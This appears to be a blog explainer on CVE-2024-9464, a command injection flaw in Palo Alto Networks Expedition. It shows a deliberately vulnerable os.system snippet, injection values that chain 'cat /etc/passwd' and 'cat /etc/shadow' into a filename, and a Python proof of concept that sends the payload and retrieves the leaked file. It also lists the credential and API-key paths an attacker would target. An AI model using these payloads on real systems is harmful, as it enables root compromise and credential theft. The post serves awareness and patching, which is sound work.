CVE-2024-9464 - OS Command Injection in Palo Alto Networks Expedition — How Attackers Can Take Control

CVE-2024-9464 is a serious security flaw discovered in Palo Alto Networks’ Expedition migration and analysis tool. If you use Expedition (before version 1.2.128), you’re at risk: this vulnerability lets attackers with credentials execute any operating system command as _root_. What’s worse? Attackers can steal usernames, cleartext passwords, device configurations, and even API keys from PAN-OS firewalls — all with a few crafted requests.

This post explains how CVE-2024-9464 works, why it’s dangerous, and shows you example exploit code so you can understand what’s at stake.

What Is Expedition?

Expedition helps network engineers migrate configurations to PAN-OS devices. It runs on Linux and often has sensitive info for multiple firewalls (think: credentials, config files). Find official info here:
- Palo Alto Networks Expedition Site
- CVE-2024-9464 at NVD

How Does CVE-2024-9464 Happen?

The root of the issue is poor input sanitization in Expedition’s web interface components. An attacker who logs into the web panel (even with a low-privilege account) can craft requests which sneak shell commands into dangerous parts of the code, usually by abusing input to Python scripts.

Why Is This So Dangerous?

Because Expedition runs everything as _root_, any command injected this way is executed by the most privileged account on the system. This means:

- Attacker can directly read files like /etc/passwd or Expedition SQLite/MySQL databases that hold device credentials and keys.

Example: Exploiting CVE-2024-9464

Let’s go through a theoretical (but realistic) example. Assume Expedition has an API for running migration “jobs” where user-provided parameters are passed straight to a shell command.

Note: Below is a recreation for education — actual request formats may differ.

Discovery Phase

An attacker registers or compromises an account and logs into Expedition. They notice that certain functionality takes user input and runs it through an OS shell. For example:

import os

def run_config_migration(config_filename):
    cmd = f"/usr/bin/python3 migrate.py --config {config_filename}"
    os.system(cmd)

If the app does not sanitize config_filename, a malicious filename could be

myconfig.xml; cat /etc/passwd > /tmp/leaked

This causes the shell to run

/usr/bin/python3 migrate.py --config myconfig.xml; cat /etc/passwd > /tmp/leaked

Now /tmp/leaked contains all users on the system!

Exploit (Python PoC)

This example assumes you have a session cookie after authenticating.

import requests

# Change these:
url = "https://<expedition-host>/api/migrate";
session_cookie = "YOUR_EXPEDITION_SESSION_COOKIE"

# Malicious payload to read /etc/shadow (hashed passwords)
malicious_filename = "foo.xml; cat /etc/shadow > /tmp/pwned.txt"

data = {
    "config_file": malicious_filename,
    "other_param": "value"
}

headers = {
    "Cookie": session_cookie
}

response = requests.post(url, data=data, headers=headers)
if response.ok:
    print("Injected payload, now fetching results...")

    # Fetch exfiltrated file
    leaked = requests.get(
        f"https://<expedition-host>/static/tmp/pwned.txt";,
        headers=headers,
        verify=False
    )
    print(leaked.text)
else:
    print("Error sending exploit")

Remember: this is for demonstration only. Actual attack vectors may use different endpoints or parameters.

What Data Can Be Stolen?

- /home/user/expedition-beta/database/db.sqlite — Contains device admin usernames/passwords
- /home/user/expedition-beta/API_KEYS/ — PAN-OS API keys
- Firewall config backups/config files

Expedition web user credentials

Attackers can then use this info to compromise firewalls and orchestrate advanced attacks.

Update Expedition to 1.2.128 or later as soon as possible:

Official Release Notes

References

- Palo Alto Networks Security Advisory
- NVD Entry for CVE-2024-9464
- Expedition Documentation

Conclusion

CVE-2024-9464 is as critical as it gets for anyone using Expedition. With just an internal credential, attackers can take over the system and loot sensitive firewall credentials. Patch now. Rotate your secrets. And always remember: never trust user input in your scripts!

If you found this helpful, please share it with your IT team and stay secure.

Timeline

Published on: 10/09/2024 17:15:20 UTC
Last modified on: 10/18/2024 11:49:42 UTC